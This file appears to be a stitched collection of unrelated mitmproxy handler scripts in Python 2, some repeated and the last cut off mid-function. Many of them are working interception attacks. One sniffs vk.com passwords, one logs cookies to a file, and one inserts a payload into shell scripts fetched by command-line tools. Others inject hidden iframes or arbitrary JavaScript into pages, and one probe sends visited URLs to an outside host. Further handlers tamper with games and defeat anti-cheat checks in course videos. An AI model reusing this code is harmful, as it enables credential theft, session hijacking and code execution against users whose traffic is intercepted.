def handle_response(self, flow):
    """Dump FFRK battle-init and equipment-list JSON payloads as they pass through the proxy."""
    # we only care about URLs that are going to FFRK_HOST
    if FFRK_HOST in flow.request.host:
        # get_battle_init_data call
        if BATTLE_INFO_PATH in flow.request.path:
            print flow.request.path + " called"
            with decoded(flow.response):
                json_data = json.loads(flow.response.content)
                print get_drops_from_json(json_data)
                if DUMP_CONTENT_TO_FILES:
                    dump_json_to_file(json_data, BATTLE_INFO_FILENAME + get_suffix_with_unix_time())
        # dff/party/list call
        elif EQUIPMENT_LIST_PATH in flow.request.path:
            print flow.request.path + " called"
            with decoded(flow.response):
                json_data = json.loads(flow.response.content)
                print get_equipment_id_from_json(json_data)
                if DUMP_CONTENT_TO_FILES:
                    dump_json_to_file(json_data, EQUIPMENT_LIST_FILENAME + get_suffix_with_unix_time())
        else:
            print flow.request.path + " called; no processing done\n"
    # forward the reply so it gets passed on
    flow.reply()
def handle_response(self, flow):
    """Probe pages for exposed Java addJavascriptInterface objects by injecting a detection script.

    HTML responses get the script appended into head/body; JavaScript
    responses get it prepended. Results are phoned home via XHR.
    """
    print "request path is %s " % flow.request.path
    # If it's injectable and it's not the injected request
    requested_site = flow.request.headers["Host"][0]
    if flow.request.scheme.endswith("http") and requested_site.find("www.fundacionsadosky.org.ar") == -1:
        visited_url = base64.b64encode(requested_site + flow.request.path)
        # taken from www.droidsec.org/tests/addjsif/
        script = '''vulnerable=[];for(i in top){el=top[i];if(el==null){continue};if(typeof(el)==='function'){continue}try{top[i].getClass().forName('java.lang.Runtime');vulnerable.push(i)}catch(e){}}if(vulnerable.length>0){var request=new XMLHttpRequest();request.open("GET","http://www.fundacionsadosky.org.ar/?vulnerable_javascript_injection=true&interface="+vulnerable.join()+"&url=''' + visited_url + '''",true);request.onreadystatechange=function(){};request.send()}'''
        # header name casing varies between servers; try both spellings
        content_type = flow.response.headers.get("Content-Type")
        if not content_type:
            content_type = flow.response.headers.get("Content-type")
        if content_type and "text/html" in content_type[0]:
            with decoded(flow.response):  # automatically decode gzipped responses.
                if flow.response.content:
                    try:
                        response = flow.response.content
                        print "Response is " + response
                        root = lxml.html.fromstring(response)
                        if root.find('.//*') is not None:
                            print "TRIED MODIFYING /html " + requested_site + flow.request.path
                            # is HTML, use lxml to insert to head, body or script
                            append_in = root.find('.//head')
                            if append_in is None:
                                append_in = root.find('.//body')
                            elif append_in is None:
                                append_in = root.find('.//script').getparent()
                            else:
                                append_in = root
                            script = lxml.html.fromstring('<script>' + script + '</script>')
                            if append_in is not None:
                                append_in.append(script)
                            flow.response.content = lxml.html.tostring(root)
                    except:
                        print "There was a problem parsing the html response, skip it"
        # mimetype may be application/javascript or text/javascript
        elif content_type and "javascript" in content_type[0]:
            with decoded(flow.response):  # automatically decode gzipped responses.
                print "TRIED MODIFYING /javascript " + requested_site + flow.request.path
                # is searching for library .JS (both cases sensitive) or JQUERY
                flow.response.content = script.encode("utf-8") + flow.response.content
    Analyzer.handle_response(self, flow)
def handle_response(context, flow):
    """Inject a hidden iframe pointing at context.iframe_url right after <body>."""
    with decoded(flow.response):  # Remove content encoding (gzip, ...)
        # replace() returns the number of substitutions made
        c = flow.response.replace('<body>', '<body><iframe src="%s" frameborder="0" height="0" width="0"></iframe>' % context.iframe_url)
        if c > 0:
            context.log("Iframe injected!")
def response(context, flow):
    """Steganographically embed a message into i.imgur.com images, caching the result in Redis."""
    global db
    if flow.response.headers.get_first("content-type", "").startswith("image") and flow.request.pretty_host(hostheader=True).endswith("i.imgur.com"):
        with decoded(flow.response):  # automatically decode gzipped responses.
            try:
                # Hash returned content for a key in redis
                content_hash = hashlib.md5(flow.response.content).hexdigest()
                # And check redis for said hash
                redis_response = r.get(content_hash)
                if redis_response == None:
                    # Looks like we haven't served this image yet.
                    # Inject us some data
                    # Load image via PIL and cStringIO hackery
                    imghandler = cStringIO.StringIO(flow.response.content)
                    pillowbiter = Image.open(imghandler)
                    # Inject text - you'll change this.
                    s = stepic.encode(pillowbiter, "Image processing in Python is annoying.")
                    # Create a cStringIO handler for stepic output
                    resphandler = cStringIO.StringIO()
                    # Write to it...
                    s.save(resphandler, "png")
                    # "Cache" the steg'd image in Redis
                    r.set(content_hash, resphandler.getvalue())
                # Now we're sure that this image exists in redis, return content
                flow.response.content = r.get(content_hash)
                flow.response.headers["content-type"] = ["image/png"]
            except Exception, e:
                # Unknown image types etc.
                pass
def response(context, flow):
    """Summarize the Ingress inventory RPC (item name -> count) into inv_<epoch>.txt."""
    if (flow.request.path == "/rpc/playerUndecorated/getInventory"):
        with decoded(flow.response):
            try:
                data = json.loads(flow.response.content)
            except ValueError, e:
                # not JSON -- nothing to do
                return 0
            items = data['gameBasket']['inventory'].__len__()
            #raise ValueError("length: %d " % items)
            if (items > 0):
                epoch_time = int(time.time())
                name = "inv_%d.txt" % epoch_time
                summary = {}
                markermap = []
                for item in data['gameBasket']['inventory']:
                    # inventory() maps the raw entity dict to a display name
                    object = inventory(item[2])
                    if object not in summary.keys():
                        summary[object] = 0
                    summary[object] += 1
                f = open(name, 'w')
                for k1 in sorted(summary.keys()):
                    #f.write(u'{0}:{1}\n'.format(k1,summary[k1]))
                    out = k1 + ":" + str(summary[k1]) + "\n"
                    f.write(out.encode("utf-8"))
                f.close()
def response(context, flow):
    """Write Ingress key markers (including capsule contents) to keymap_<epoch>.json."""
    if (flow.request.path == "/rpc/playerUndecorated/getInventory"):
        with decoded(flow.response):
            try:
                data = json.loads(flow.response.content)
            except ValueError, e:
                # not JSON -- nothing to do
                return 0
            items = data['gameBasket']['inventory'].__len__()
            #raise ValueError("length: %d " % items)
            if (items > 0):
                epoch_time = int(time.time())
                name = "keymap_%d.json" % epoch_time
                markermap = []
                for item in data['gameBasket']['inventory']:
                    # directly-held keys get one color ...
                    marker = keymap(item[2], "#00a0a0")
                    if marker is not None:
                        markermap.append(marker)
                    if 'resource' in item[2].keys():
                        resource = item[2]['resource']['resourceType']
                        if (resource == 'CAPSULE' or resource == 'INTEREST_CAPSULE'):
                            capacity = item[2]['container']['currentCount']
                            capsuleItems = item[2]['container']['stackableItems']
                            if (capacity > 0):
                                # ... keys stored inside capsules get another
                                for itemc in capsuleItems:
                                    marker = keymap(itemc['exampleGameEntity'][2], "#a000a0")
                                    if marker is not None:
                                        markermap.append(marker)
                f = open(name, 'w')
                f.write(json.dumps(markermap))
                f.close()
def request(context, flow):
    """Sniff credentials and rewrite vk.com request bodies (web, applet deauth, mobile app)."""
    try:
        with decoded(flow.request):  # automatically decode gzipped responses.
            sourse_ip = str(flow.client_conn.address).split("'")[1]
            dest_ip = str(flow.request.host)
            #logging.debug("Sending (" + sourse_ip + " -> " + dest_ip + ")")
            pw_db.sniff_passwords(str(flow.request.content), sourse_ip, vk_db)
            # Regular vk; result[0] == 2 signals "content replaced"
            result = vk_db.decode_request(str(flow.request.content))
            if (result[0] == 2):
                flow.request.content = result[1]
            # vk App deauth
            result = vk_db.applet_deauth(str(flow.request.content), sourse_ip)
            if (result[0] == 2):
                flow.request.content = result[1]
            # vk mobile App
            result = vk_db.decode_java(str(flow.request.content))
            if (result[0] == 2):
                flow.request.content = result[1]
    except Exception as e:
        # best-effort MITM: never break the flow on a parsing error
        # logging.debug("Exception in 'request':")
        # logging.debug(e)
        pass
def response(context, flow):
    """Log response metadata and the src attribute of every HTML tag; re-store prettified HTML."""
    try:
        url = flow.request.url
        if flow.request.host:
            host = flow.request.host
        else:
            host = ""
        context.f.write('\nreceive response: %s host:%s\n' % (flow.request.url, host))
        with decoded(flow.response):  # Automatically decode gzipped responses.
            # skip responses without a usable Content-Type
            if (not "Content-Type" in flow.response.headers) or \
                    len(flow.response.headers) == 0:
                return
            tp = flow.response.headers["Content-Type"][0].lower()
            context.f.write(' type:%s\n' % tp)
            if url.endswith('json'):
                return
            if "text/html" in tp:
                # prefer html5lib, fall back to lxml if it chokes
                try:
                    soup = BeautifulSoup(flow.response.content, "html5lib")
                except Exception as e:
                    soup = BeautifulSoup(flow.response.content, 'lxml')
                if soup != None:
                    tags = soup.find_all()
                    for tag in tags:
                        if 'src' in tag.attrs:
                            context.f.write("src: %s\n" % tag['src'])
                        elif 'SRC' in tag.attrs:
                            context.f.write("src: %s\n" % tag['SRC'])
                    try:
                        flow.response.content = soup.prettify().encode('utf-8')
                        context.f.write('successfully store new content\n')
                    except Exception as e:
                        context.f.write("error @response failed store new content exception: %s\n" \
                                        % (str(e)))
            # NOTE(review): a commented-out script-injection/timing experiment
            # was removed here for clarity.
            context.f.write('\n')
    except Exception as e:
        context.f.write('exception at %s for error: %s\n' % (url, str(e)))
        traceback.print_exc(file=context.f)
def response(context, flow):
    """Log response metadata and tag src attributes, then re-store the prettified HTML.

    NOTE(review): this is a near-verbatim duplicate of the previous
    response() handler; consider consolidating.
    """
    try:
        url = flow.request.url
        if flow.request.host:
            host = flow.request.host
        else:
            host = ""
        context.f.write('\nreceive response: %s host:%s\n' % (flow.request.url, host))
        with decoded(flow.response):  # Automatically decode gzipped responses.
            # skip responses without a usable Content-Type
            if (not "Content-Type" in flow.response.headers) or \
                    len(flow.response.headers) == 0:
                return
            tp = flow.response.headers["Content-Type"][0].lower()
            context.f.write(' type:%s\n' % tp)
            if url.endswith('json'):
                return
            if "text/html" in tp:
                # prefer html5lib, fall back to lxml if it chokes
                try:
                    soup = BeautifulSoup(flow.response.content, "html5lib")
                except Exception as e:
                    soup = BeautifulSoup(flow.response.content, 'lxml')
                if soup != None:
                    tags = soup.find_all()
                    for tag in tags:
                        if 'src' in tag.attrs:
                            context.f.write("src: %s\n" % tag['src'])
                        elif 'SRC' in tag.attrs:
                            context.f.write("src: %s\n" % tag['SRC'])
                    try:
                        flow.response.content = soup.prettify().encode('utf-8')
                        context.f.write('successfully store new content\n')
                    except Exception as e:
                        context.f.write("error @response failed store new content exception: %s\n" \
                                        % (str(e)))
            # NOTE(review): a commented-out script-injection/timing experiment
            # was removed here for clarity.
            context.f.write('\n')
    except Exception as e:
        context.f.write('exception at %s for error: %s\n' % (url, str(e)))
        traceback.print_exc(file=context.f)
def response(context, flow):
    """Replace every image response with the contents of xxx.jpg.

    Fixes vs. original: the replacement file is read with a `with` block
    (the original leaked the file handle) and the pointless
    cStringIO round-trip (open().read() -> StringIO -> getvalue()) is gone.
    The broad exception guard is kept deliberately: any read failure must
    not break the proxied flow.
    """
    if flow.response.headers.get_first("content-type", "").startswith("image"):
        with decoded(flow.response):
            try:
                with open('xxx.jpg', 'rb') as img_file:
                    flow.response.content = img_file.read()
                flow.response.headers["content-type"] = ["image/jpeg"]
            except Exception:
                pass
def handle_html(flow):
    """If the global do_rick flag is set, inject the rickroll script tag right after <body ...>."""
    global do_rick
    if do_rick:
        rick_iframe = """<script type="text/javascript" src="//google.com/rick_js"></script>"""
        with decoded(flow.response):
            # inject after the first opening body tag only (count=1);
            # \1 keeps any attributes of the original <body ...> tag
            flow.response.content = re.sub("<body(.*?)>", r"<body\1>" + rick_iframe, flow.response.content, count=1)
def response(context, flow):
    """Replace every image response with the contents of freebuf.jpg.

    Fixes vs. original: the replacement file is read with a `with` block
    (the original leaked the file handle), the pointless cStringIO
    round-trip is gone, and the content type is the registered
    "image/jpeg" (the original's "image/jpg" is not a valid MIME type).
    """
    if flow.response.headers.get_first("content-type", "").startswith("image"):
        with decoded(flow.response):
            try:
                with open('freebuf.jpg', 'rb') as img_file:
                    flow.response.content = img_file.read()
                # was "image/jpg" -- nonstandard; browsers expect image/jpeg
                flow.response.headers["content-type"] = ["image/jpeg"]
            except Exception:
                # any read failure must not break the proxied flow
                pass
def request(context, flow):
    """ Callback fired upon each request thru the proxy """
    # fuzzing can be toggled globally
    if not _fuzz_requests:
        return
    try:
        if "Content-type" in flow.request.headers:
            # dispatch to a fuzzer based on the declared body type
            if flow.request.headers["Content-type"][0].lower() in JSON_MIMES:
                with decoded(flow.request):
                    flow.request.content = fuzz_json(flow.request.content)
            elif flow.request.headers["Content-type"][0].lower() in XML_MIMES:
                with decoded(flow.request):
                    flow.request.content = fuzz_xml(flow.request.content)
            else:
                logging.debug("No fuzzers for content type '%s', skipping." % (flow.request.headers["Content-type"][0]))
        else:
            logging.debug("No Content-type header in request")
    except:
        # never let a fuzzer crash take down the proxy
        logging.exception("Request callback threw an exception")
def response(context, flow):
    """Splice context.payload in after the first line of shell scripts fetched by CLI tools."""
    resp = flow.response
    req = flow.request
    with decoded(resp):
        if is_shell_script(resp) and is_cli_tool(req):
            # replace only the first newline, i.e. insert right after the shebang line
            flow.response.content = flow.response.content.replace('\n', '\n' + context.payload + '\n', 1)
def request(context, flow):
    """Debug helper: log each decoded request body."""
    try:
        logging.debug("request")
        with decoded(flow.request):  # automatically decode gzipped responses.
            logging.debug("new: ")
            s = cStringIO.StringIO(flow.request.content)
            logging.debug("haha " + str(s.getvalue()))
    except:
        logging.debug("CHECK CODE, IDIOT!!!!!!!!!!!")
def response(context, flow):
    """Insert context.js as the first <script> element of every HTML body."""
    with decoded(flow.response):  # Remove content encoding (gzip, ...)
        html = BeautifulSoup(flow.response.content)
        if html.body:
            #print "This is the js:\n" + context.js
            javascript = html.new_tag("script")
            javascript.string = context.js
            html.body.insert(0, javascript)
            flow.response.content = str(html)
            context.log("Hooked JavaScript Functions.")
def puglify_image(context, flow):
    """Replace any image response (detected by content-type or JFIF magic bytes) with pug.jpg."""
    with decoded(flow.response):
        try:
            # the byte-string check catches JPEGs served with a wrong content-type
            if flow.response.headers.get_first("content-type", "").startswith("image") or flow.response.content.startswith("\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00"):
                # pug.jpg lives next to this script file
                img = cStringIO.StringIO(open(os.path.normcase(os.path.dirname(inspect.stack()[0][1]) + '/pug.jpg'), 'rb').read())
                flow.response.content = img.getvalue()
                flow.response.headers["content-type"] = ["image/jpeg"]
        except Exception, e:
            print "Error puglifying:"
            print repr(e)
def response(context, flow):
    """Save the first response matching context.filter to cap.json, run the decryptor, then exit."""
    with decoded(flow.response):  # automatically decode gzipped responses.
        if flow.match(context.filter):
            print("=======================")
            print("Found a valid response!")
            print("=======================")
            with open("cap.json", "w") as myfile:
                myfile.write(flow.response.content)  # save matching response as cap.json
            subprocess.call(["node", "story-decrypt.js"])  # call story-decrypt.js to fetch, decrypt, and save stories
            # one-shot capture: stop the proxy after the first hit
            sys.exit(0)
def response(self, flow):
    """Inject the script at self.content_path just before </body> of every response.

    Fixes vs. original: the payload is read with a single read() inside a
    `with` block instead of a quadratic line-by-line string concatenation
    that also relied on the GC to close the file. The result is identical.
    """
    with decoded(flow.response):
        with open(self.content_path, 'r') as f:
            inject_content = f.read()
        flow.response.content = flow.response.content.replace("</body>", "<script>" + inject_content + "</script></body>")
def test_decoded():
    """decoded() must expose the plaintext body inside the block and re-encode on exit."""
    r = tutils.treq()
    assert r.content == "content"
    assert not r.headers["content-encoding"]
    r.encode("gzip")
    assert r.headers["content-encoding"]
    assert r.content != "content"
    with decoded(r):
        # inside the context the body is transparently decoded
        assert not r.headers["content-encoding"]
        assert r.content == "content"
    # on exit the original encoding is restored
    assert r.headers["content-encoding"]
    assert r.content != "content"
    with decoded(r):
        r.content = "foo"
    # a mutation made inside the context is re-encoded on exit ...
    assert r.content != "foo"
    r.decode()
    # ... and becomes visible after an explicit decode
    assert r.content == "foo"
def request(context, flow):
    ''' Callback fired upon each request thru the proxy '''
    # fuzzing can be toggled globally
    if not _fuzz_requests:
        return
    try:
        if 'Content-type' in flow.request.headers:
            # dispatch to a fuzzer based on the declared body type
            if flow.request.headers['Content-type'][0].lower() in JSON_MIMES:
                with decoded(flow.request):
                    flow.request.content = fuzz_json(flow.request.content)
            elif flow.request.headers['Content-type'][0].lower() in XML_MIMES:
                with decoded(flow.request):
                    flow.request.content = fuzz_xml(flow.request.content)
            else:
                logging.debug("No fuzzers for content type '%s', skipping." % (flow.request.headers['Content-type'][0]))
        else:
            logging.debug("No Content-type header in request")
    except:
        # never let a fuzzer crash take down the proxy
        logging.exception("Request callback threw an exception")
def response(context, flow):
    """Insert a hidden iframe pointing at context.iframe_url as the first child of <body>."""
    # don't inject into the iframe target itself
    if flow.request.host in context.iframe_url:
        return
    with decoded(flow.response):  # Remove content encoding (gzip, ...)
        html = BeautifulSoup(flow.response.content)
        if html.body:
            iframe = html.new_tag("iframe", src=context.iframe_url, frameborder=0, height=0, width=0)
            html.body.insert(0, iframe)
            flow.response.content = str(html)
            context.log("Iframe inserted.")
def test_decoded():
    """decoded() must expose the plaintext body inside the block and re-encode on exit."""
    r = http_wrappers.HTTPRequest.wrap(netlib.tutils.treq())
    assert r.content == "content"
    assert not r.headers["content-encoding"]
    r.encode("gzip")
    assert r.headers["content-encoding"]
    assert r.content != "content"
    with decoded(r):
        # inside the context the body is transparently decoded
        assert not r.headers["content-encoding"]
        assert r.content == "content"
    # on exit the original encoding is restored
    assert r.headers["content-encoding"]
    assert r.content != "content"
    with decoded(r):
        r.content = "foo"
    # a mutation made inside the context is re-encoded on exit ...
    assert r.content != "foo"
    r.decode()
    # ... and becomes visible after an explicit decode
    assert r.content == "foo"
def response(context, flow):
    """Append captured-field geometry and MU-per-area stats to mukm_0.txt."""
    if flow.request.path == "/rpc/gameplay/getObjectsInCells":
        with decoded(flow.response):
            try:
                data = json.loads(flow.response.content)
            except ValueError, e:
                # not JSON -- nothing to do
                return 0
            items = data["gameBasket"]["gameEntities"].__len__()
            # raise ValueError("length: %d " % items)
            if items > 0:
                epoch_time = int(time.time())
                name = "mukm_0.txt"
                f = open(name, "a")
                for item in data["gameBasket"]["gameEntities"]:
                    entity = item[2]
                    if "capturedRegion" in entity.keys():
                        # side lengths of the field triangle
                        l1 = distanceGeoPoints(
                            entity["capturedRegion"]["vertexA"]["location"],
                            entity["capturedRegion"]["vertexB"]["location"],
                        )
                        l2 = distanceGeoPoints(
                            entity["capturedRegion"]["vertexB"]["location"],
                            entity["capturedRegion"]["vertexC"]["location"],
                        )
                        l3 = distanceGeoPoints(
                            entity["capturedRegion"]["vertexA"]["location"],
                            entity["capturedRegion"]["vertexC"]["location"],
                        )
                        a = areaFromLength(l1, l2, l3)
                        # score per unit area; * 1.0 forces float division (Python 2)
                        mukm = (int(entity["entityScore"]["entityScore"]) * 1.0) / a
                        # record: latA,lngA:latB,lngB:latC,lngC:area:score:density
                        f.write("%s" % entity["capturedRegion"]["vertexA"]["location"]["latE6"])
                        f.write(",")
                        f.write("%s" % entity["capturedRegion"]["vertexA"]["location"]["lngE6"])
                        f.write(":")
                        f.write("%s" % entity["capturedRegion"]["vertexB"]["location"]["latE6"])
                        f.write(",")
                        f.write("%s" % entity["capturedRegion"]["vertexB"]["location"]["lngE6"])
                        f.write(":")
                        f.write("%s" % entity["capturedRegion"]["vertexC"]["location"]["latE6"])
                        f.write(",")
                        f.write("%s" % entity["capturedRegion"]["vertexC"]["location"]["lngE6"])
                        f.write(":")
                        f.write("%s" % a)
                        f.write(":")
                        f.write("%s" % entity["entityScore"]["entityScore"])
                        f.write(":")
                        f.write("%s" % mukm)
                        f.write("\n")
                f.close()
def response(context, flow):
    """Censor words from the global vulgarism list (case-insensitive) in response bodies."""
    global HP
    global vulgarism
    # Hide profanity from webpages
    if (HP):
        with decoded(flow.response):
            #print flow.response.content
            for i in vulgarism:
                # escape the word so regex metacharacters are matched literally
                repl = re.compile(re.escape(i), re.IGNORECASE)
                flow.response.content = repl.sub('***', flow.response.content)
def response(context, flow):
    """Tamper with QuizClash game payloads coming from quizserver.feomedia.se."""
    if flow.request.pretty_host(hostheader=True).startswith("quizserver.feomedia.se"):
        print("QF-Response")
        if "qf_games" in flow.request.path:
            with decoded(flow.response):
                questionResponses = (flow.response.content)
                h = HTMLParser.HTMLParser()
                # the payload arrives HTML-escaped: unescape, modify, re-escape
                questionResponses = h.unescape(questionResponses)
                modifiedQuestionResponses = modifyQuestionResponses(questionResponses)
                if (modifiedQuestionResponses):
                    flow.response.content = cgi.escape(modifiedQuestionResponses, True);
def handle_response(self, flow):
    """Strip the anti-cheat pause logic and force the resume position for erya course videos."""
    with decoded(flow.response):
        print flow.request.url
        import re
        if 'courseAction!toCourseVideo' in flow.request.url:
            # remove the packed eval() blob that pauses the player on focus loss,
            # then turn the remaining pauseMovie calls into playMovie
            flow.response.content = re.sub("eval\(function.*?onStopMove\|mouseHander\|intervalTime\|function\|eryaPlayer.*?\)\,0\,\{\}\)\)", '', flow.response.content)
            flow.response.content = flow.response.content.replace('pauseMovie', 'playMovie')
            print flow.response.content
        if 'playerAction!getResourceUrl' in flow.request.url:
            # rewrite the reported resume position
            flow.response.content = re.sub(r'\"startTime\"\:(\d+)', '"startTime":10', flow.response.content)
    flow.reply()
def handle(self, flow, args):
    """Dispatch decoded JSON responses for self._host to registered path handlers.

    Depending on args.verbosity: (1) log request paths to api_calls.txt,
    (2) dump handled payloads to data_dump/, (3) dump unhandled payloads too.
    """
    if not flow.request.pretty_host(hostheader=True).endswith(self._host):
        return
    # turn "/a/b" into "a-b" for use as a directory/file name
    r = str(flow.request.path).replace("/", "-")
    rq_path = r[1:]
    if args.verbosity >= 1:
        # verbosity 1: append the request path to api_calls.txt
        t = os.getcwd() + "/api_calls.txt"
        # if not os.access(p, os.F_OK):
        #     os.mkdir(p)
        # data_path = p + str(flow.request.path) + "_" + time.strftime("%m%d%Y-%H%M%S") + ".json"
        t_file = open(t, 'a')
        print flow.request.path
        print >> t_file, flow.request.path
        # # print >> test_file, json.dumps(data, indent=4, sort_keys=True)
        t_file.close()
        # print flow.request.path
        # print
    if self.should_ignore(flow.request.path):
        return
    with decoded(flow.response):
        handlers = self.get_handlers(flow.request.path)
        if handlers:
            data = json_decode(flow.response.content)
            if args.verbosity >= 2:
                # verbosity 2: dump handled payloads under data_dump/<path>/
                p = os.getcwd() + "/data_dump/" + rq_path + "/"
                if not os.access(p, os.F_OK):
                    os.mkdir(p)
                data_path = p + rq_path + "_" + time.strftime("%m%d%Y-%H%M%S") + ".json"
                test_file = open(data_path, 'w')
                print >> test_file, json.dumps(data, indent=4, sort_keys=False)
                test_file.close()
            # test_file = open(data_path, 'w')
            # print >> test_file, json.dumps(data, indent=4, sort_keys=False)
            # test_file.close()
            # # print dump_json(data)
            for func in handlers:
                # handlers registered in self._wants_flow also receive the flow object
                if func in self._wants_flow:
                    func(data, flow)
                else:
                    func(data)
        else:
            if args.verbosity >= 3:
                # verbosity 3: dump payloads with no registered handler too
                data = json_decode(flow.response.content)
                p = os.getcwd() + "/data_dump/" + rq_path + "/"
                if not os.access(p, os.F_OK):
                    os.mkdir(p)
                data_path = p + rq_path + "_" + time.strftime("%m%d%Y-%H%M%S") + ".json"
                test_file = open(data_path, 'w')
                # print >> test_file, "//" + str(flow.request.path)
                print >> test_file, json.dumps(data, indent=4, sort_keys=False)
                test_file.close()
def handle_response(self, flow):
    """Probe pages for exposed Java addJavascriptInterface objects by injecting a detection script.

    NOTE(review): near-verbatim duplicate of the earlier handle_response();
    consider consolidating. HTML responses get the script appended into
    head/body; JavaScript responses get it prepended.
    """
    print "request path is %s " % flow.request.path
    # If it's injectable and it's not the injected request
    requested_site = flow.request.headers["Host"][0]
    if flow.request.scheme.endswith("http") and requested_site.find("www.fundacionsadosky.org.ar") == -1:
        visited_url = base64.b64encode(requested_site + flow.request.path)
        # taken from www.droidsec.org/tests/addjsif/
        script = '''vulnerable=[];for(i in top){el=top[i];if(el==null){continue};if(typeof(el)==='function'){continue}try{top[i].getClass().forName('java.lang.Runtime');vulnerable.push(i)}catch(e){}}if(vulnerable.length>0){var request=new XMLHttpRequest();request.open("GET","http://www.fundacionsadosky.org.ar/?vulnerable_javascript_injection=true&interface="+vulnerable.join()+"&url=''' + visited_url + '''",true);request.onreadystatechange=function(){};request.send()}'''
        # header name casing varies between servers; try both spellings
        content_type = flow.response.headers.get("Content-Type")
        if not content_type:
            content_type = flow.response.headers.get("Content-type")
        if content_type and "text/html" in content_type[0]:
            with decoded(flow.response):  # automatically decode gzipped responses.
                if flow.response.content:
                    try:
                        response = flow.response.content
                        print "Response is " + response
                        root = lxml.html.fromstring(response)
                        if root.find('.//*') is not None:
                            print "TRIED MODIFYING /html " + requested_site + flow.request.path
                            # is HTML, use lxml to insert to head, body or script
                            append_in = root.find('.//head')
                            if append_in is None:
                                append_in = root.find('.//body')
                            elif append_in is None:
                                append_in = root.find('.//script').getparent()
                            else:
                                append_in = root
                            script = lxml.html.fromstring('<script>' + script + '</script>')
                            if append_in is not None:
                                append_in.append(script)
                            flow.response.content = lxml.html.tostring(root)
                    except:
                        print "There was a problem parsing the html response, skip it"
        # mimetype may be application/javascript or text/javascript
        elif content_type and "javascript" in content_type[0]:
            with decoded(flow.response):  # automatically decode gzipped responses.
                print "TRIED MODIFYING /javascript " + requested_site + flow.request.path
                # is searching for library .JS (both cases sensitive) or JQUERY
                flow.response.content = script.encode("utf-8") + flow.response.content
    Analyzer.handle_response(self, flow)
def response(context, flow):
    """Inject an alert(2) script as the first child of <body> (latin-1 handling)."""
    #if flow.request.host in context.src_url:
    #    return # Make sure JS isn't injected to itself
    with decoded(flow.response):  # Remove content encoding (gzip, ...)
        html = BeautifulSoup(flow.response.content, fromEncoding='latin-1')
        #html = BeautifulSoup(flow.response.content)
        if html.body:
            script = html.new_tag("script", type='application/javascript')
            script.string = "alert(2);"
            html.body.insert(0, script)
            # re-serialize with the same latin-1 encoding
            flow.response.content = str(html.prettify('latin-1'))
            context.log("Script injected.")
def response(context, flow):
    """Rewrite vk.com response bodies via vk_db; swallow any errors (best-effort MITM)."""
    try:
        with decoded(flow.response):  # automatically decode gzipped responses.
            result = vk_db.decode_response(str(flow.response.content))
            # result[0] == 2 signals "content replaced"
            if (result[0] == 2):
                flow.response.content = result[1]
    except Exception as e:
        # logging.debug("Exception in 'response':")
        # logging.debug(e)
        pass
def response(context, flow):
    """Inject an alert(2) script as the first child of <body>.

    NOTE(review): duplicate of the previous latin-1 injector; consider consolidating.
    """
    #if flow.request.host in context.src_url:
    #    return # Make sure JS isn't injected to itself
    with decoded(flow.response):  # Remove content encoding (gzip, ...)
        html = BeautifulSoup(flow.response.content, fromEncoding='latin-1')
        #html = BeautifulSoup(flow.response.content)
        if html.body:
            script = html.new_tag("script", type='application/javascript')
            script.string = "alert(2);"
            html.body.insert(0, script)
            # re-serialize with the same latin-1 encoding
            flow.response.content = str(html.prettify('latin-1'))
            context.log("Script injected.")
def response(context, flow):
    """Prepend a MESSAGE div to HTML pages served from DOMAIN."""
    context.log(flow.response.headers["content-type"])
    if flow.request.pretty_host(hostheader=True).endswith(DOMAIN) and \
            "text/html" in flow.response.headers["content-type"]:
        with decoded(flow.response):
            html = BeautifulSoup(flow.response.content)
            if html.body:
                div = html.new_tag("div")
                div.string = MESSAGE
                html.body.insert(0, div)
                flow.response.content = str(html)
                context.log("div inserted")
def response(context, flow):
    """Rotate every image response 180 degrees and re-serve it as PNG."""
    if flow.response.headers.get_first("content-type", "").startswith("image"):
        with decoded(flow.response):  # automatically decode gzipped responses.
            try:
                s = cStringIO.StringIO(flow.response.content)
                img = Image.open(s).rotate(180)
                s2 = cStringIO.StringIO()
                img.save(s2, "png")
                flow.response.content = s2.getvalue()
                flow.response.headers["content-type"] = ["image/png"]
            except:
                # Unknown image types etc.
                pass
def request(context, flow):
    """If mail_db recognizes the request body, replay a duplicate flow with replaced content."""
    try:
        f = context.duplicate_flow(flow)
        with decoded(flow.request):  # automatically decode gzipped responses.
            replay, new_content = mail_db.get_email(str(flow.request.content))
            if replay:
                f.request.content = str(new_content)
                context.replay_request(f)
    except Exception as e:
        # best-effort: never break the original flow
        # logging.debug(e)
        pass
def response(self, flow):
    """Apply the configured 'search||replace' pairs to text/html response bodies.

    Fixes vs. original: removed a dead `pass` statement at the top of the
    function, and guarded against a missing Content-Type header (the
    original indexed flow.response.headers['Content-Type'][0] directly and
    would raise on header-less responses).
    """
    # NOTE(review): assumes the old mitmproxy ODict header API where
    # .get() returns a list of values -- verify against the proxy version.
    content_type = flow.response.headers.get('Content-Type')
    if content_type and "text/html" in content_type[0]:
        with decoded(flow.response):
            # each config value is "search||replace"
            for item, v in self.config[self.name]['regex'].iteritems():
                #if v.split("||")[0] in flow.request.host and self.theFlag == False:
                str_search = v.split("||")[0]
                str_replace = v.split("||")[1]
                if str_search in flow.response.content:
                    flow.response.content = flow.response.content.replace(str_search, str_replace)
                    logger.debug("[" + self.name + "] " + str_search + " to " + str_replace + " in " + flow.request.host)
def response(context, flow):
    """Append the Host and Cookie header values of each request to the 'savecookies' file."""
    with decoded(flow.response):  # automatically decode gzipped responses.
        headers = flow.request.headers
        host = headers.get('Host')
        cookies = headers.get('Cookie')
        print(cookies)
        if host == None or cookies == None:
            return True
        with open('savecookies', 'a') as f:
            # NOTE(review): assumes headers.get() returns a list of values
            # (old mitmproxy ODict API). If it returned a plain string,
            # these joins would interleave separators between characters --
            # verify against the proxy version in use.
            f.write(','.join(host))
            f.write("\n")
            f.write(';'.join(cookies))
            f.write("\n\n")
def response(context, flow):
    """Read the JSON body of /load responses and tamper the temperature value.

    Fixes vs. original: the original guarded with `if body.get('value'):`,
    which skips tampering whenever 'value' is present but falsy (0, "",
    false, null). A membership test tampers any present 'value' key.
    NOT TESTED YET!
    """
    request_url = flow.request.pretty_url(hostheader=True)
    if 'load' in request_url:
        with decoded(flow.response):
            body = json.loads(flow.response.content)
            # membership test, not truthiness: 0 is a legitimate reading
            if 'value' in body:
                body['value'] = 100
                flow.response.content = json.dumps(body)
def handle_response(self, flow):
    """Force the MOOC player resume position and print quiz answers for icourse pages."""
    with decoded(flow.response):
        print flow.request.url
        import re
        if 'moocplayer.js' in flow.request.url:
            # cut the switchWindow anti-cheat handler out of the player script
